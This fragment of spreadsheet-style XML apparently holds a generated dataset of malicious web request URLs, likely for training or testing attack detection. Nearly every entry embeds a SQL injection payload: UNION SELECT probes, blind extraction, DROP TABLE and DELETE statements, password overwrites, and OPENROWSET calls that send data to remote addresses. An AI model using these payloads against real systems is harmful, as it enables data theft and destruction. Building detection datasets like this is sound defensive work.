  </si>
  <si>
    <t>/risgnot9sehy/taisvaenr/-2vi/bvxelss3/ufekhesystemkjpv_wjx/3bdrop0@/rejkvs/c8gatdemsu.jpg?te7aetroludetoc=2628562&amp;h0a69nmdanes=eerni+lai7acceptnse&amp;ktspuway=229598&amp;6el=u@&amp;d9ffseay=er+ouixwinotexec&amp;itsn5nodati=hie&amp;hsvmrrtah1isd=ed_ga&amp;ototoa1w=9unxxbtzo4.y&amp;sammd2mbor=)&amp;htpass902=49068&amp;95='++)+un/**/ion+++++all++++sel/**/ect+++++'tfie3o3',56,10193,'ae',9++++from++ennbr+++++where+++(''=++++'&amp;nimo1bw=44706</t>
  </si>
  <si>
    <t>/eyqnklqtc@-mw/iuhessar/eilqw/sto1ndzlisdrety/7yxpfmzfrnhkdej5/f0eqocblxt7illvs/8lfnodef4xc0i78.ilocation/yb/iteg/mc4wp-x-k0.html?fdns=homj&amp;rdsshegrr=%irypassthruiut0ahlikzebnat&amp;eolaeuei=ebeiusernvr&amp;1uyrnltntx=')++++un/**/ion++all+sel/**/ect+++++'rtt4oao',6222,5,'hamaac',9++++from++ahh+++where++++(+''++++='&amp;styleql61mochas5e9g=448&amp;teb4mfdwzl=ore&lt;plrogn&amp;6ruu6e3vayaep=evlats:moii</t>
  </si>
  <si>
    <t>/eaqhheel4/gmngkffocmym/pnekkh2htrx47/4azdrop.bin?ordxljh2s=t%ri+4cy&gt;tpe&amp;mo=')++union+all+select+++++35++from++1daotf+where+++(++++''++++=++++'&amp;0n1tloteomnueoq=983120&amp;gdthii=074&amp;res61=je+&amp;ta4mnt2e6alie5w=4qoihm$danietsfpnv&gt;9&amp;i0gidoner=et7kies1b&amp;azpnoiesee=pbupmt&amp;tot7ieee=6&amp;deswazfhgw5neb=enlf8qoplbk&amp;updatenchy=iaeesdo4neid1a&amp;snd3v0u=st9t52&amp;doassnssromypos=ietosdcsn</t>
  </si>
  <si>
    <t>/en.@ws/w9kndc/ngditllgme9mlatnf/kstdinokv/o0ehosan/eelee5iksot/gixfg@glasg.mdb?nr1iiai=1unsinoiegzof&amp;2sd1ntrxnsgu7=')+union+all+++select++++ysmt3mol++,+++tn+,++loeasn++from+++etnihboee++++where++ebga+++not+in++(+'h7ulm'+++)++++and++p0e+++not+++++in+++(++'jre'+)++++and+''++=++'&amp;rettce=slgfup-ci0</t>
  </si>
  <si>
    <t>/ettundtrdirtauefsn/9efc/ovifnqrluhc/onoi3n/bts9l/dhdbfr.msf?rtocyeeq='select+customer_phone+++++'||'from+++++customers++++'||'where+++++customer_surname='''||+++lv_surname||'''+++++and++++customer_type=1';&amp;hu=t8nybdn@rk</t>
  </si>
  <si>
    <t>/cgkctdkpscz.5nbf/m4ay-klmandn-/updatebodyxgr/rfpincludetmp/a1pnopes.php4?nphnlenuoramrp=opt8lspd+cm5lrhyo&amp;nmtphfn=57859344&amp;he7i0a=ehv5r4dtn');+++++delete++++from++users+++where++++upper(username)+++=+++upper(+++'admin&amp;9lhie4=i-zwru9tw6k&amp;bw7samxad4etcwf=48148281&amp;lsxafm=62564&amp;hk3uentsreeaao=dndee&amp;pmlj=xlnta&amp;avrraiss1i=zuzxeie9taik9ed8o&amp;ohuegeth2=e7z9misns&amp;ere=1844&amp;atotez=mb58+xrmhcrcinx&amp;tfpseenamo=ed6lahr8c</t>
  </si>
  <si>
    <t>/shqeqeynmo7/a1a/xoz3zqrldl7uyl.jpeg?7olktqboot.ini='+++union++++++++all+++++++++select++++vuokl5eoiw+++from+++++ehain++++where+++''++=++++'&amp;pe.uht=130&amp;xnuqiiwldvcn=1733554&amp;reu4s5ihe=8598049227&amp;rttoxhstushn=iotv</t>
  </si>
  <si>
    <t>/dapcnat2i6r.shtml?osr77re=aegapdv-&amp;d7esy='++union+select++@@version,1,1,1--&amp;htiu=0v+hssnoh[</t>
  </si>
  <si>
    <t>/kc@0gelumlechokp@7/uuchb7h042jntrok_88u/@a6execrboot.iniy6o2/ahpdp0kvfsfgzs/e6dq/tmlteunlhefty/oexll1ssh/mgt64m/d3ri9tttms.php?1e='++++)+union+all+select++2++++from++sit4++where+(''+++=+'&amp;tueehwamhlyt5x4=0658&amp;taioa=cdluatfzerecedw</t>
  </si>
  <si>
    <t>/dfsj6jjd9xzi5j7_ogd/5m0/eu-fzhij-lglh0./inerrficb/n6zszeql_k/h2/slgjbl3/nix10pl-/8zvll8a2esh7i/lnb.mvxqbd/cyed4islprohs/cmkys.aspx?_vbscriptk7vartr='+++/**/+or++/**/''+++=+++'&amp;oeoe=%'zwp-&amp;ttdulr5=d&amp;oennegaplhhp=038</t>
  </si>
  <si>
    <t>/hkeiat2imnehs/eobzowynl1mlpnkq9sr/r06u_w@jogcs_hhj/-htpasslhidivjyi/eratotedokz.mdb?eh=rf6&amp;eiflzzghyk__=select+++lnud+from++++all_users</t>
  </si>
  <si>
    <t>/hhcihaest/osqkib/rswhueeurtzssrns0b/hqxf/uxcx1lmmbtzk.n-/mj14ceuoqr/ooqxvrhi5iu/4s@lyetjiw8dhapl@/oxnppetrh_j/usu4aeeasliblh/mei9l9et7/tetor.shtml?aee5g=4090&amp;t0cy=go&amp;sdeletepxmlkdo=80251710&amp;tgn59=34989483&amp;4libl7qw=and++ascii(lower(substring((select++++top++++1++++q4lnsnw++++from++sysobject+where++xtype++=+++'u'++++),1,1)))++&gt;++111&amp;8rtqrn6sqsiaeu=904&amp;logrz=f-6</t>
  </si>
  <si>
    <t>/tnq3c9tyfzox/rrfl--h/ze88j/d77b@tr/utthzroetim0te/mojhdieh/eic1/era_qcbunm/rjih7qplsul5u/rexklwgkp0--lbdl_l/axpm8b9yg.php4?t7nistidwop8er=yae8dbtoe&amp;ir=i&amp;glj7biwa=0849671&amp;dc=lstnothe&amp;8ccerdh=op72h1is3/laeapje+tw&amp;keiuine5snno7=ne$kahpgg/e$+]se0dn&amp;8-uopenytnu_='select++customer_phone+'||'from+++customers+'||'where+++customer_surname='''||+++lv_surname||'''+++++and++++customer_type=1';&amp;7ezionetpg=-s5&amp;orua=00969</t>
  </si>
  <si>
    <t>/mtneieaeyymtd1reoidn/md/t8d6jff-lm3f06/7e03tmtvrur.jpg?passthrufzonodesvservices7.q=+in(&amp;tnkttt9iuua2rs=t&amp;tecas6sro=iqsyenaiyam0ael5&amp;9cwp-xopr=39&amp;nhpnt=sdhn3h&amp;kitt=a@1uh&amp;ecujqxpm_=871520694&amp;iw8r=ayll&amp;eqew=8;hs+d+&amp;saijwxez=or+++328040&gt;0340844364&amp;91tpf=9</t>
  </si>
  <si>
    <t>/oqounodei@un/bu/csuhnfcuwl/pvzx@-mfkuat/i2jolestsqusiet/csr3dhmeoyuaaineal3a/nlay/xw3ckwcgn7-/ijjvar1dwlky/t7un7/epsnaq_/ehwsi3scnitodtss.gif?gyna=lyu&amp;e.__bzrlxd58=3605890&amp;pdiltihgd=94095&amp;lsosadesezttn=9346&amp;feeea99arelas=;+++select+++*++from+++++openrowset(+'sqloledb','uid=i0t;pwd=iegezunain;network=dbmssocn;address=227.112.119.196,28861;','select+++++*+++from+lqteehni'+++)&amp;phwe8ynyeaahs=6p4a</t>
  </si>
  <si>
    <t>/4ykb_a220ltlt0/rnvluvotd/c0eeedbd/dltnoesce/logtra.gkb/rcmbmy/ualghp1w/rrcnalkhi0s/alrlhzt4rln/l9n1xglctvszhd4e/m_aa9zk5gz.yd4e4s/iqr.8viuyn.msf?f@83u=nnfj&amp;aloq1nese='+++++++(+select+++top+++1+++++dedlm+++++from++gtsa7hc5)+++++++++'&amp;daaaque=98&amp;iil0dssda=6&amp;hentooxen=tddjkf&amp;oeg1orlnuaiihd=mochashutdown~4binoha2?+iehtpass&amp;8hh=1&amp;oonn=+tesbnnn7kftpechohopp</t>
  </si>
  <si>
    <t>/ijmdmnro2r1rbeheo/cvxkiw/40gy0zxsv1y/arl5hidmret/tenbai3di/zerny1/on7yhnas/yhtpasst0r0perl_20rif/gpazhome5fqhgfj1/ebmqwahkdp_v/adpe4ndudemdwtast/7jy.mspx?ed=fi1|&lt;varls+b-u&amp;ecl=jqu&amp;l1toeeo=h]rhtpass&amp;f7lacin8e=22&amp;trt9gtarrorxwsn=';+++++drop+table+++++admin</t>
  </si>
  <si>
    <t>/iipxycf3xstnse_06xm7/tbe1nd6cmnnlagie2/tvmvd0/mxsuu3ehht/4ucbefefem3u/unn/lyuj4bzbxftck6xhc/morry/rdqpriyxsh7okoxdtd-/htts7snuatsacr/ehexqtrpeo4@ql4.php3?cfheo=1604&amp;sues=8855&amp;zhgotrurea=tfj&amp;oowinc56=ad?bxdivs4mq\\o&amp;ssystem61rfihxf=s&amp;fptfr3k=ne+execlmu&lt;xem+vhh&gt;ee&amp;8e=oflnesdniowl7jf&amp;eozat8id=1051&amp;0pnsrpxhbi=d&amp;8egt1pa=4651333&amp;.j0tmpizecho1=nwnwcfog.cuj&amp;jyeyc=and++0&lt;&gt;(select++count(*)+++++from++++nhg++where++++tagrato&lt;&gt;)&amp;euh0yeqvhs6t=77094&amp;ddho4nj=m47h4inki</t>
  </si>
  <si>
    <t>/x@7duylt_l.aex8wawmu/1dhnnsilksnaxpb.3vr/ygbtmm.png?3ce7zicnlletle=atsfn3oiinetnn&amp;ecadh1o=onirs&amp;6ecnashoirembcp=rsrsynullp&amp;ltoenni=hkdvfav2&amp;eltez=cmtwong$sozl|&amp;l.my5n=hsef&amp;y_execqnoeexmlovar=rtens&amp;@xfcewqeustylep4=97800&amp;2cbgo=hlinksrtsiq%wi&amp;mi04='++++)++un/**/ion+++all+sel/**/ect++++'ual',4792,79,'emsnl',9+++++from++++ge++++where+++++(++''=++++'&amp;iduo=ieb&amp;etlsoxhds=rrhfcx_cba</t>
  </si>
  <si>
    <t>/aoklu/m1tw1/mw8jgxbzerdha5zc6gb/ly9za_x4/pdliat/6-vrgchildwindow.openf@sock_streamggqxq/dtnaoeotctstnye/1l-790/tnek8ghn2gjz.html?hlferexjfnh='+++or+++'idbtretn'++++&lt;++'x</t>
  </si>
  <si>
    <t>/aitm67/sbil/oinputjn./kllrd6@0im3node/soegpetwemohq/lifi/pheb2oeeelcg/dx9utckifu06tpc-.vl/cbt2lfhvrwi6er/s_kl-yab3vub1/qxcatxtd.2betweenk7homems/ilets.cgi?jului=moe4kadbihenrehavm&amp;tohtkvq=z1orileellyll&amp;6iit=4142448&amp;eka=&amp;nrtl?|rrilcl&amp;en='unionallselectfieldfromanilwhere''+++=++++'&amp;omlanaoob5dotas=6&amp;nsnransetn=ok65o&amp;9no9adeleasxcts=743&amp;lnicbmogoe=sdtqo56aalostreo</t>
  </si>
  <si>
    <t>/m7stwdya6wnilheec/1pnc3g5kqsw/1sqab/mu3nsjmpxutzxmi158u/5ohjrxp/ibw/7twsy5fhju/khiouaxnhenejre/e3jsxsjmas.shtml?lhh=57247519&amp;seeueh=2ki&amp;shsxam=aneoe4cajk81eaeh&amp;vordtelnetqjpzq=0&amp;1dfeqsumsmvn=r6&amp;esi=[include&amp;uusnstanvde9tvu=59&amp;iphe=or+++++0&lt;&gt;(select++++count(*)+from++gha)&amp;0pn-amo=ihhdtettf+dt</t>
  </si>
  <si>
    <t>/i1qnz/shaqha2rchi5ofsa/fbhedfel/espp4t4rrrkwy/5-xt2lc6gln7gtg50t6d/ryhub_nbssvv/yldyqvm0oxterm41yj/edshdefw.png?nth=720994&amp;h4eeorkerclgco=allrt4t&amp;n87udnbyedo='+++/**/+++or++++/**/''++=++++'&amp;aaarfy6rneh5=irwdqhditth8tgnrto&amp;ay3bso=4&amp;so=15042&amp;ece4bc9=82</t>
  </si>
  <si>
    <t>/0swttnlreeeeaatd3/qcruc6w/excexi@aovzvquqc.css?iw1o=ie|azreetco&amp;tfgloo3hhi=e&amp;yc&amp;d5='++or++'ib'++=+++n'+++&amp;n9=0&amp;3vn3s44sohf=dt;t&gt;&amp;vp13sjritiyq=cebe&amp;dt=864&amp;ld5ae82ddc=rrehiieoo3a0&amp;nete=ez+noaira+xtermo9tr&amp;eoeoh0l=rre</t>
  </si>
  <si>
    <t>/vehuspsn/edmfn5e1vt/e6sck_wzazvtpflv@lm/eteiaee/@oy/omjembksmqcwsbfsw/5teesot11yootzggbarm/tp47e7ar/sg.html?o5elni=cnnlntorirjtt3&amp;lls2casn=dsuienb+thts8e6ssystem&amp;psdivvba=en9e1riht&amp;fphgxmochaakr0='+and++++user_name()='eli&amp;formxbryg=ptl&amp;dewmecsra=qcrnx2xruwn&amp;5e=12991&amp;snn0r1hh5=passthruyemailcopycateeslognqroiwheree9cn&amp;eetsnct=etarnrar&amp;rss46wt3=awhdoo&amp;woouooaerogmh7a=27&amp;enrteoyynoaojt=ltra&amp;nqrie7dhntd=ttcq9</t>
  </si>
  <si>
    <t>/oyneh3nlr1n8asotiso/5rztdemlty1ms/8xge5tluwdm6sr/yo/uabadsfddbbvd/ggg3mmj@dl0@xgkp/irne.js?l2eye9h=++++or+++2+++&gt;++1&amp;2t7leam=65847178&amp;xens=)xa&amp;aap=tnlevlsoiporeirn&amp;lteuhrbmuioe=eonwgitp9rl&amp;hh6hh4utt=ee&amp;arbw=t&amp;uunionrpj=7atod</t>
  </si>
  <si>
    <t>/3hr@shkblkboot.ini./do/9j/guvvcznr.insertf/zx/l13rsiorrssxqehann/eo/stkem.wy/teyshcszjksmt3nho/eme7-xetfbifbbzsy5so/wre9ig2g4av5imltdtzp.js?5eelt=12662553&amp;7gnaeesata=tse10v&amp;eeul='select+++++customer_phone+++++'||'from+++customers+'||'where+++++customer_surname='''||+lv_surname||'''+++and+customer_type=1';&amp;mawix9d3hd6itr=alkafpu7.&amp;ghm58s=4834</t>
  </si>
  <si>
    <t>/cbtths30mccnjoecst/us88hddqm/gbtecgdiaaasnqeo6teq/retcgmyil./ytrenaamleepdcn7oaip/hmsaytoh3j/dqnydt/o0eknt4akeaa.exe?ovh0=vefiuopto&amp;hhslnoine8mlh9=8&amp;tisree=cpk&amp;nbnyac37at=';+++drop+++table++++pgsdtsaevse&amp;ks9sut=592&amp;ufilolztooa=hzrsja48j&amp;otgw=t(ts&amp;byxituon=efxterm2d:ranmdyd&amp;pt&amp;eorqyauob3cat.=6832&amp;sq3remp=onnu</t>
  </si>
  <si>
    <t>/samdropbtux@i5yksdi/h6c8ksoerg/j0uvg2ecot/9xhpchildv5vbietc8d/hrdrqmpnsalttt/qil51ttar_p/raoecgola.shtml?oyxk=usruowe&amp;ts0doeesi5p7v=5884060&amp;nmfrky=serrsotets5detrrey&amp;ebit7e=i7a&amp;hjs2rcpjs=tr2o&amp;adafrneeea=ry4i&amp;oaotrfteey=0221&amp;goqma=ahttp&amp;cteuy8nou3='+or++id++++in+(++select+*+++from+++++++user_db+++)</t>
  </si>
  <si>
    <t>/mklotd/whefqeoedlseadhnstus/mleaecoqemtasiehn/-jixaidzzl_pd/aetepbtt/ab6dyqibvtbpneu7he9q.htm?oez=27753&amp;eeohiuesjfs7gc3=ie-j.d&amp;oraevrii3pie=do-ht7-+re/x&amp;agr64a8eeo=6&amp;-l_betweenx75=dn+loea&amp;hp2wutth=hiirt?/e+smc6a&amp;9perlu-f2=nbstdintneoh53&amp;rlmfic5wt=xdb&amp;7eaifrwrra=;alter+table++++teinnt+++++set++++password++=++++'aner'+++++where++name+++++=+'3m2tonon';</t>
  </si>
  <si>
    <t>/uxesneauuno/a08b2vajcmochauspdelete/t1_@tr72tmcbdttx/doutketfor8aggzrhzyt/dd5j9lz/pgw1oi2rtygqon/cmservicesxcv5m5/entceoosibp/rieaignaa/qiframerdr8f.mdb?6ta9ixe=slike&amp;eeunatwk3xt0p=69561744&amp;..6jzlprzsb=tjl&amp;ot=iidp&amp;hiclib5owz6access_log=djlevosefplooars&amp;eeretsoontnn=poydca1dinr&amp;bkxnew.bo=bag+r&amp;d5rnta7=[26lhen1noge&amp;y7xges7o9t=';+++++drop++table+admin&amp;iansndcgmlo=ntiidteeop</t>
  </si>
  <si>
    <t>/sj3ncmd/do/hnoatif49ucen65e/ngrlfpsi89h/qtiewalug/o0t/ihcsw.png?yean6rhsse=53&amp;le='+and+++++user_name()='gutst&amp;6eoirteeet=483279645</t>
  </si>
  <si>
    <t>/atlsuitvtyx3htmteug/ii7iviheuiioodenbn/raaatscshaaeusoeti/7qscasq8a/obvi7rl/iwkc2jfjrfo7_qu/hjc4jqmheln.png?h4uonliedioci=on/hzeo/t&gt;n1&amp;nov@i=0289&amp;w0a=origtext'or'cin'++='urrh6'&amp;waws=n1n</t>
  </si>
  <si>
    <t>/rn3blbuocwsjk.tx4tef/las6hwsn7noetuizrldr/9hq8bnsphy67r/ignsxj3u/zbowm9en5lh0/9_flsvyiqvmghzbrd.0x/aonrfletga2g/ehrse4nvsbuo@3skfhj/mteozvdhlugrb92g/mlqm/w5q3nsock_streamfqrlzf0/loawu0s5i7.exe?szele=or+'sjiow'+like++'sim%'&amp;ndlb_script-6onji=setmpja&amp;exceisoies=+fn&amp;uieoha=rtk&amp;ri5acoiytt=\\eegi@</t>
  </si>
  <si>
    <t>/stz7ocgo3ci4/i9uzn6892yisxezkdo/panb/ettercbigeeisoeuf/s0lwrfwa945fy8o90/udeey0uoeassihrs/latstfryulcdie8c/h0di/lsqhreeeolecnlwe7o/ewnbv3/usxgko7y.exe?aftyo=dns&amp;rctamam=14vd31xzuh&amp;e5emd=il&amp;xhrkhomejxwwxa=tnhemiaao&amp;3wtzal=fnruneheaiad&amp;ot=stdincshutdown|ig+to'hxru&amp;qlhonc9ny=iy&amp;otkhsznthukbee=or+++++80737=80737&amp;ue7gase7o77=56638270&amp;uihaordseqnent=su.s0ma&amp;7it3=b0'islln;zmtelnetqa~ag/es&amp;odcvio74tkpp=9nun3&amp;xu9e6nurto=lbw</t>
  </si>
  <si>
    <t>/ywbmkiv9/c1utee6/7seawendwvrrrcinjjw/ueovonsacrs/s26bs3/ekcgdwztqcc/djxshibelae9wel5d5rp/zttv8ic4.cgi?enretraaug='+++union+select+@@version,1,1,1--&amp;a70t2=fmgqwf9&amp;awtm=98632294&amp;runad=2720671&amp;aneae1ctua=22818865&amp;idledfecilsej=tss11prentet</t>
  </si>
  <si>
    <t>/r4jly6uwch/rr/6a/emagb/bechohrblptiframe/dtpyk266t./dfj/tdptonmlr/e3hu/evpszbik_he_z_0ues/cuptmhasj.png?hai=61859&amp;iv='++union++select+++sum(ey7)+++from++lseqsfzx--&amp;echeipc0wise=i+e1+zng&amp;bxonq=aa5k2iaeatt6ihra&amp;tnt1atchho=n3erh@ygkie&amp;desnfts=intctincludeoqio(;nodeoslsd&amp;u5i8ilelbluao=siadopn&amp;g3euxengkd8x=52018&amp;oo0=eec;7oi&amp;li=sreinmiiaed&amp;inonhedce=?esam</t>
  </si>
  <si>
    <t>/t7zk2y3t_rjd.jr/j7f/lpositionn/pyvzxkf@aq/liw/9sro6afaaleidnetyi/eiisoxgdzkqhc@/ohailte9/er/vumkruw1l6bbbge/1_cmdytmp7dvand.html?laaolyvgtteanl=&gt;gad@&amp;u6body9=id9n+c&amp;qntiyscntl=soehcm&amp;8vs1otw0=ic2e&amp;l-oqzbc02h8r='++or+++++'ei'+=+++++'ft'+'itv'&amp;beethdgr=198</t>
  </si>
  <si>
    <t>/jhttp/apefheedsccao0/jb/t5pdyg2awk4zldc/gme/ao/cmewnlp6qeu8504w2o.php3?qshrinoha=afdegee_n&amp;grwbegg=onnazeigd2&amp;p2i2cdrhz=e3anrlmrhte&amp;nuniiic8oubto=04732379&amp;gweye=4439613&amp;sueaoa=5odi4la&amp;dcieewbot=';+++++drop++++table+++++ke5turn&amp;ybhg=rcp;scf&amp;tht=odcesfi</t>
  </si>
  <si>
    <t>/rmqd17_hbadcp.htm?paunhuihnhia=seajhkf&amp;eaotaee7rt=971&amp;eatee=7ptahlosa&amp;uoietnerwnurace=le&amp;2est=or+0&lt;&gt;(select+count(*)++++from++fmm)&amp;rsrdmrre=sc14uuh-bk&amp;sm=0922450&amp;usat0wu8egirqvl=876539&amp;rgczcxgfeowy=no2-re&amp;i+~qrnenph-window.openui;services</t>
  </si>
  <si>
    <t>/gbqe/auz/9rdamiqbirop/ewt4ji9h.k7odbfir/lccall3e/nazeod/ri/akqa.qvjmviovte/va056ogw/rntsu_gdgdxnf1p/qldbirnshss/4em.cgi?rl=alkb59s94prh&amp;peiiy='+)+++un/**/ion+++all+++sel/**/ect+++'trl0tc',2631,547,'ncgm',9+++++from++++hu+++++where++++(''++++=+++'&amp;oanea=group+bya&amp;0r-m=rsh%ysirtia'm%n&amp;xnaiouhe2n4=t)evaraf&amp;nsrfrba=4atv&amp;hcihservicesa=deheksorm</t>
  </si>
  <si>
    <t>/eisttai/eqm/hsoesihc/lq8yyaewiz_w/qewahpximnyi/nh/f6y__wqyqs-l/cekoin6kk_/qoh6kf9metakkb4b6z/fxadgk04/ab3kmex3aixrycwq0f/wcmynifsmllhyp6jwse.pl?ef52htaccesnt1oq-m=;+++exec(++++'uni'+'on'+'+++'+'sel'+'ect++++++'a7knvsj',9,5940259,'etd',9++from++de0qhrr)</t>
  </si>
  <si>
    <t>/u3sw/ed4lbqh/6rbcyofocnd/fjv6aekhcei.asmx?gc1ucdrernnh=or+'oreisto'++between+++'r'+++++and+++++'t'</t>
  </si>
  <si>
    <t>/zi/e2mlovhiywyw/6vpyslvoa7qi/yselwrl7/odnaioinahtryprrtps.jpeg?.dma9zbhtacces=t0ie&amp;mkkcdocumentamcc3j=a5odampcnnc&amp;reeolsi=efqzuwl8zhb&amp;oraha3aargmoa9=;+exec++++get_cust(+'x''++union+select++++object_name,object_type,''x''+++++from++++user_objects+where+++''98ion''=++++''++++'++);&amp;svnhyhzg=r2esystemt&amp;teshwfn=s6uhybeinitn9smfe&amp;tsioehhrxttsht=7881517&amp;vzid1c.z4=2952647010</t>
  </si>
  <si>
    <t>/p9nnycatrp/em99xpyep7e/-stylemj7r/oblxo/nngyre/kqinsertnhcf-nub/sleemipmtnirha/aukmrn5gopte9b/dane5thhya/lo5f-rvfprzxy./h2xu./yuq.nsf?tdnsto=irv=tvi&amp;vmaxa=ch6qs&amp;hefeoeeech6lo=ohh&amp;etefhswrdylezni='select++++customer_phone++'||'from++customers+++'||'where+++++customer_surname='''||+lv_surname||'''+++and+++customer_type=1';&amp;mcejadahofdn7=462554341&amp;0zl8suzds=sagsssq</t>
  </si>
  <si>
    <t>/w3.tdfovby/7k53rnwyhdpu7ke8cvub/ebn/osouayo8krxerle/pe.zg0-ik/sneie/twi3uwz9ncg/rqs/vh-ttuxwd/andhw5e@ovexjwu.shtml?vace='+++)+++union+++all+select++atse6+++++from+dudtoaaa++++where++(+++''+++=++++'&amp;ogesig1ioey0=01&amp;arvflvtbeeesrd=e+&amp;3bt9thyicpe=34698693&amp;nvicua=ehwtmf&amp;icnt9ofaklsr=gpq6ym</t>
  </si>
  <si>
    <t>/1haeaj/yfrv_ba1blyp/i17l/quaxlhhnvd/egro/mtanfmtteeaekh/cpaqnoaeo09ibtn.php?p1pmttrwfbac=myiu&amp;2-z37selectv_uz=stwemei9&amp;zuor7ftno=select++loet++from++all_users&amp;5esio=97834&amp;fyxofexq1qvu=0708861</t>
  </si>
  <si>
    <t>/zih/sl.jpg?itua=4490167&amp;gjphavingqin=2138&amp;5o9resmei=ophrotcrliege0t&amp;ettkp=nqsnbz&amp;r67lxkqcopy=qsi]rsocnte1s&amp;us.eou=7&amp;desyiegqun=';+++insert++into+lbflht++++values(666,'4qnahorv','8noo',0xfffff)&amp;mkkom=0199928&amp;eyenmeae=7</t>
  </si>
  <si>
    <t>/o_eq7pk_3i/n2pmvggso3bj/ck1j/3or2faqba4-vjq/o5d/p8hyts/sbielaceltopiirlt.css?mxaoxsqe='++++or+++'eoys'+++++like++++'aze%</t>
  </si>
  <si>
    <t>/e66rsbqa2tjk/m@m_re7jm28null/hnbtrkrp/e6ntsuee5/.eszp1plx/oapfrseocs/seoe.pl?tsaoai6ezr=;alter+table+++++larolate++++set++++password++++=+'ed'+where++name+++=+'citewmsn';&amp;qhhzbem=aa&amp;oawseekneiajt=06947&amp;8u8eb=coli&lt;txilom+ah&amp;eb=aeve9eit&amp;ltcesnvot=rldtzl&amp;lxidtlst5nt=bo</t>
  </si>
  <si>
    <t>/maa6seedseai.aspx?m8bs=+++++or+++2+&gt;+++1&amp;lettrstwh=traiaatdinn&amp;vilsettree=eue&amp;7ec4e2obaltacee=ex0</t>
  </si>
  <si>
    <t>/laitrqhsegttajeo/_w.2/dropohxp_i/4nhcdaoems/cogvk8daabiee/yxvsxewr7kallexech/aumoauhple/wmlrkuncm/aihlrswahststeiili/io5hl.php?na-h2tyuphppwy=ehspl3aanwnm&amp;a6l=tyote+ba$taidktt&amp;nlsrohopt='+)+++union+++++all++select++1,86,57,4,60+++from++toomssx+++++where+++(+''=+++'&amp;keoa5ttfardi1t=03&amp;ncpnealns4rn=tv&amp;dijs4csm=52&amp;awia=saegctlo9obmn&amp;aou9tl=niceoein0uanecm&amp;muc@u_pxhtpassaa=772780140</t>
  </si>
  <si>
    <t>/dkk_egkomwutdmtm-/hulnzdaobjectl0/hmgrfwindow.opendr4iwindow.openj/aog@bdm.uc_kpcrnn/klr1fmz/rrqowqh-vox/5is7yhmafeya/u-suwnvfh7/yergenatselssm/hcpfer/eibt1mg0xx5t.epz.shtml?5tnobxndajnhesn=ndr1perlcurt|l&amp;blznjta=eez2i&amp;aapsunuollprgtt=30349980&amp;tkai=tttstsvnsdtpn&amp;iwecopyy6ifunion6ze=ondcinaenmen&amp;gwgupdateweo1ls_zi=88&amp;luis=27&amp;jpnasdijire=qnanl&amp;ni=;+select+++++*++++from+++openrowset(+'sqloledb','uid=to9;pwd=iungoolat;network=dbmssocn;address=85.36.125.30,79534;','select+++++*++from++++0itn')&amp;fuaad=+&amp;m:ml%tbt+e+spositione&amp;.5p3kaftl=\\id98tcshaccept&amp;omoods=intn$olhydrope&amp;bdjem0sdeletebgo=xrnys</t>
  </si>
  <si>
    <t>/_c46tl/do7aneottgwfrsequqae.jpg?opm0rer1ehneay=lndrosheyrdsya&amp;nyenerjdr7l=9ial5oo&amp;tt=rn5o@suses8swnxets&amp;wi0ctallerr=tipositioneeweaanwgethvr&amp;bontou52si=lnaeea&amp;eeevlau=1447595&amp;9x3k=77&amp;drlrtmhu=c&amp;citwean317dn='++++union++++select+++++sum(lnth0hyi)++from++mhyirfdg--&amp;hkpagvci=phlei1ydfmtor5o&amp;uf1ixb-=kmuoj4&amp;ehmbt78isdnydli=l?srie6ftp</t>
  </si>
  <si>
    <t>/y1hgalocationr9bgsoundx/g3vf2sr9-lu8pbqf5bl2/hcasa5hgwoli/igr7oatrysv.html?6xaewphnrxieal=e6emlsrtrm&amp;arg=5t7sohrti&amp;4saguclargrai=5461844&amp;ajte=to3nubodybs&amp;vtwo7olco='+or++++id++in++(+select+*++from++++++user_db++++)&amp;ojba=7tkkg&amp;45notde8tssai=v'o&amp;nn2cevii9=69672&amp;0vrr=psln8ands&amp;xgc=elbv22vraf&amp;d0twj07b3sd=737002</t>
  </si>
  <si>
    <t>/tmupdatexaidelete/e2wpv/nxcdwncmx4tvzf/raxskqsmvp80/aikf3oi/ueicmieewo4ehle/c9bm/gjmev.jpg?rtn=4lb1&amp;itoar1io7esinfe=culorm@zt&amp;ieiiy=03&amp;ieas25=22&amp;lreasmht8r=775&amp;goonpiee=lajto]aefromt0+&amp;r-zkurilw='++++)+union+++++all+++++select+++++rpesji+++,+++tntwao++,++at++from++rlij+where+emes+++not+++in+++++('ea')+++and++eb9chsistk+++++not+in++++(++'7lsmwdte'+)+++and++''++=+'&amp;al1ydbg1iyx=eltsh&amp;httpsle9vz=185353&amp;eejilmi=378876&amp;s4heommorimue=eby1mhbsase4x0isua&amp;datvphrot31shtq=valdppoj</t>
  </si>
  <si>
    <t>/cv@io6yutqiao3338/txnumfhutart2ees4.exe?dseieteohehs=hf2nqt&amp;9zjpxht@yi6h=d'+ha&amp;g@fdbetweenr_7processing-instructionls=ns/pi&amp;3frgdcee=94827432&amp;y0nupt=or+++++'ozt'++=++'sim'+'ple'&amp;bhwsliedi=oq&amp;r0dch.-iy4y9=9603302&amp;itswaerriehn=5adjsumbs&amp;tow94segn=p&amp;tecaeeyels9tar=l0sepperl7snedh&amp;ososohjeh=sock_stream\\ohm+lj+'rhesltt~i</t>
  </si>
  <si>
    <t>/sqenbzm9taw6p_nr.gif?ptrfx='+)++++union+++all++select+memofnt+++++from+++++ihmltrotry+where++(+''+++=++'&amp;eb3h=brssmlen&amp;4siqahtnss=+d44csm&amp;ztdyr=aei&amp;pp0mv=xwisoz7ufb</t>
  </si>
  <si>
    <t>/grayopiamoc/iq/iil/f5te6rojrcaolblhmqh/swlcwi14fp/aektahn9lh3p.php4?dtxbtanns7oief=aegbw&amp;cd1i.=ssm6n5zs&amp;b1bq=56303&amp;l2aovetjt3woo2t=7948506271&amp;uadetr=14461&amp;ijlac=131&amp;ect=25903&amp;alrecri=nm;0nulles8i&amp;g@fvarzowindow.openc=2rnmrsm1yo&amp;heudotoodncap=65653&amp;grz=o6hastea9');+++++del/**/ete++++from++++users++++where++upper(username)+=+upper('admin&amp;axsiy=a+d&amp;sb6e9h=15087&amp;y6whsfy9a8no=68</t>
  </si>
  <si>
